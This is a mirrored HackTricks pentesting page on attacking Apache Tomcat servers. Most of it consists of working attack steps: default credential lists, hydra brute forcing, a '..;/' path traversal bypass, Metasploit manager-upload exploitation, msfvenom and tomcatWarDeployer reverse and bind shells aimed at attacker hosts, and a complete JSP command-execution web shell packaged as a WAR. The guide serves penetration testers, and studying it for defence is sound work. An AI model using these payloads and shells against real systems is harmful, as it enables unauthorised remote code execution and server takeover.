mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-30 06:53:11 +00:00
293 lines
11 KiB
Markdown
293 lines
11 KiB
Markdown
|
# Tomcat
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
## Discovery
|
||
|
|
||
|
* It usually runs on **port 8080**
|
||
|
* **Common Tomcat error:**
|
||
|
|
||
|
<figure><img src="../../../.gitbook/assets/image (150).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
## Enumeration
|
||
|
|
||
|
### **Version Identification**
|
||
|
|
||
|
To find the version of Apache Tomcat, a simple command can be executed:
|
||
|
|
||
|
```bash
|
||
|
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
|
||
|
```
|
||
|
|
||
|
This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.
|
||
|
|
||
|
### **Manager Files Location**
|
||
|
|
||
|
Identifying the exact locations of **`/manager`** and **`/host-manager`** directories is crucial as their names might be altered. A brute-force search is recommended to locate these pages.
|
||
|
|
||
|
### **Username Enumeration**
|
||
|
|
||
|
For Tomcat versions older than 6, it's possible to enumerate usernames through:
|
||
|
|
||
|
```bash
|
||
|
msf> use auxiliary/scanner/http/tomcat_enum
|
||
|
```
|
||
|
|
||
|
### **Default Credentials**
|
||
|
|
||
|
The **`/manager/html`** directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:
|
||
|
|
||
|
* admin:admin
|
||
|
* tomcat:tomcat
|
||
|
* admin:
|
||
|
* admin:s3cr3t
|
||
|
* tomcat:s3cr3t
|
||
|
* admin:tomcat
|
||
|
|
||
|
These credentials can be tested using:
|
||
|
|
||
|
```bash
|
||
|
msf> use auxiliary/scanner/http/tomcat_mgr_login
|
||
|
```
|
||
|
|
||
|
Another notable directory is **`/manager/status`**, which displays the Tomcat and OS version, aiding in vulnerability identification.
|
||
|
|
||
|
### **Brute Force Attack**
|
||
|
|
||
|
To attempt a brute force attack on the manager directory, one can use:
|
||
|
|
||
|
```bash
|
||
|
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
|
||
|
```
|
||
|
|
||
|
Along with setting various parameters in Metasploit to target a specific host.
|
||
|
|
||
|
## Common Vulnerabilities
|
||
|
|
||
|
### **Password Backtrace Disclosure**
|
||
|
|
||
|
Accessing `/auth.jsp` may reveal the password in a backtrace under fortunate circumstances.
|
||
|
|
||
|
### **Double URL Encoding**
|
||
|
|
||
|
The CVE-2007-1860 vulnerability in `mod_jk` allows for double URL encoding path traversal, enabling unauthorized access to the management interface via a specially crafted URL.
|
||
|
|
||
|
In order to access to the management web of the Tomcat go to: `pathTomcat/%252E%252E/manager/html`
|
||
|
|
||
|
### /examples
|
||
|
|
||
|
Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed comprehensively, should be checked for unauthorized access and potential exploitation. Find [more info here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)
|
||
|
|
||
|
* /examples/jsp/num/numguess.jsp
|
||
|
* /examples/jsp/dates/date.jsp
|
||
|
* /examples/jsp/snp/snoop.jsp
|
||
|
* /examples/jsp/error/error.html
|
||
|
* /examples/jsp/sessions/carts.html
|
||
|
* /examples/jsp/checkbox/check.html
|
||
|
* /examples/jsp/colors/colors.html
|
||
|
* /examples/jsp/cal/login.html
|
||
|
* /examples/jsp/include/include.jsp
|
||
|
* /examples/jsp/forward/forward.jsp
|
||
|
* /examples/jsp/plugin/plugin.jsp
|
||
|
* /examples/jsp/jsptoserv/jsptoservlet.jsp
|
||
|
* /examples/jsp/simpletag/foo.jsp
|
||
|
* /examples/jsp/mail/sendmail.jsp
|
||
|
* /examples/servlet/HelloWorldExample
|
||
|
* /examples/servlet/RequestInfoExample
|
||
|
* /examples/servlet/RequestHeaderExample
|
||
|
* /examples/servlet/RequestParamExample
|
||
|
* /examples/servlet/CookieExample
|
||
|
* /examples/servlet/JndiServlet
|
||
|
* /examples/servlet/SessionExample
|
||
|
* /tomcat-docs/appdev/sample/web/hello.jsp
|
||
|
|
||
|
### **Path Traversal Exploit**
|
||
|
|
||
|
In some [**vulnerable configurations of Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) you can gain access to protected directories in Tomcat using the path: `/..;/`
|
||
|
|
||
|
So, for example, you might be able to **access the Tomcat manager** page by accessing: `www.vulnerable.com/lalala/..;/manager/html`
|
||
|
|
||
|
**Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`
|
||
|
|
||
|
## RCE
|
||
|
|
||
|
Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
|
||
|
|
||
|
### Limitations
|
||
|
|
||
|
You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](./#post)section).
|
||
|
|
||
|
```bash
|
||
|
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
|
||
|
|
||
|
# deploy under "path" context path
|
||
|
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
|
||
|
|
||
|
# undeploy
|
||
|
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
|
||
|
```
|
||
|
|
||
|
### Metasploit
|
||
|
|
||
|
```bash
|
||
|
use exploit/multi/http/tomcat_mgr_upload
|
||
|
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
|
||
|
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
|
||
|
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
|
||
|
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
|
||
|
msf exploit(multi/http/tomcat_mgr_upload) > exploit
|
||
|
```
|
||
|
|
||
|
### MSFVenom Reverse Shell
|
||
|
|
||
|
1. Create the war to deploy:
|
||
|
|
||
|
```bash
|
||
|
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
|
||
|
```
|
||
|
|
||
|
2. Upload the `revshell.war` file and access to it (`/revshell/`):
|
||
|
|
||
|
### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
|
||
|
|
||
|
In some scenarios this doesn't work (for example old versions of sun)
|
||
|
|
||
|
#### Download
|
||
|
|
||
|
```bash
|
||
|
git clone https://github.com/mgeeky/tomcatWarDeployer.git
|
||
|
```
|
||
|
|
||
|
#### Reverse shell
|
||
|
|
||
|
```bash
|
||
|
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
|
||
|
```
|
||
|
|
||
|
#### Bind shell
|
||
|
|
||
|
```bash
|
||
|
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
|
||
|
```
|
||
|
|
||
|
### Using [Culsterd](https://github.com/hatRiot/clusterd)
|
||
|
|
||
|
```bash
|
||
|
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
|
||
|
```
|
||
|
|
||
|
### Manual method - Web shell
|
||
|
|
||
|
Create **index.jsp** with this [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):
|
||
|
|
||
|
```java
|
||
|
<FORM METHOD=GET ACTION='index.jsp'>
|
||
|
<INPUT name='cmd' type=text>
|
||
|
<INPUT type=submit value='Run'>
|
||
|
</FORM>
|
||
|
<%@ page import="java.io.*" %>
|
||
|
<%
|
||
|
String cmd = request.getParameter("cmd");
|
||
|
String output = "";
|
||
|
if(cmd != null) {
|
||
|
String s = null;
|
||
|
try {
|
||
|
Process p = Runtime.getRuntime().exec(cmd,null,null);
|
||
|
BufferedReader sI = new BufferedReader(new
|
||
|
InputStreamReader(p.getInputStream()));
|
||
|
while((s = sI.readLine()) != null) { output += s+"</br>"; }
|
||
|
} catch(IOException e) { e.printStackTrace(); }
|
||
|
}
|
||
|
%>
|
||
|
<pre><%=output %></pre>
|
||
|
```
|
||
|
|
||
|
```bash
|
||
|
mkdir webshell
|
||
|
cp index.jsp webshell
|
||
|
cd webshell
|
||
|
jar -cvf ../webshell.war *
|
||
|
webshell.war is created
|
||
|
# Upload it
|
||
|
```
|
||
|
|
||
|
You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
|
||
|
|
||
|
### Manual Method 2
|
||
|
|
||
|
Get a JSP web shell such as [this](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) and create a WAR file:
|
||
|
|
||
|
```bash
|
||
|
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
|
||
|
zip -r backup.war cmd.jsp
|
||
|
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
|
||
|
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
|
||
|
```
|
||
|
|
||
|
## POST
|
||
|
|
||
|
Name of Tomcat credentials file is `tomcat-users.xml` and this file indicates the role of the user inside tomcat.
|
||
|
|
||
|
```bash
|
||
|
find / -name tomcat-users.xml 2>/dev/null
|
||
|
```
|
||
|
|
||
|
Example:
|
||
|
|
||
|
```xml
|
||
|
[...]
|
||
|
<!--
|
||
|
By default, no user is included in the "manager-gui" role required
|
||
|
to operate the "/manager/html" web application. If you wish to use this app,
|
||
|
you must define such a user - the username and password are arbitrary.
|
||
|
|
||
|
Built-in Tomcat manager roles:
|
||
|
- manager-gui - allows access to the HTML GUI and the status pages
|
||
|
- manager-script - allows access to the HTTP API and the status pages
|
||
|
- manager-jmx - allows access to the JMX proxy and the status pages
|
||
|
- manager-status - allows access to the status pages only
|
||
|
-->
|
||
|
[...]
|
||
|
<role rolename="manager-gui" />
|
||
|
<user username="tomcat" password="tomcat" roles="manager-gui" />
|
||
|
<role rolename="admin-gui" />
|
||
|
<user username="admin" password="admin" roles="manager-gui,admin-gui" />
|
||
|
```
|
||
|
|
||
|
## Other tomcat scanning tools
|
||
|
|
||
|
* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
|
||
|
|
||
|
## References
|
||
|
|
||
|
* [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
|
||
|
* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|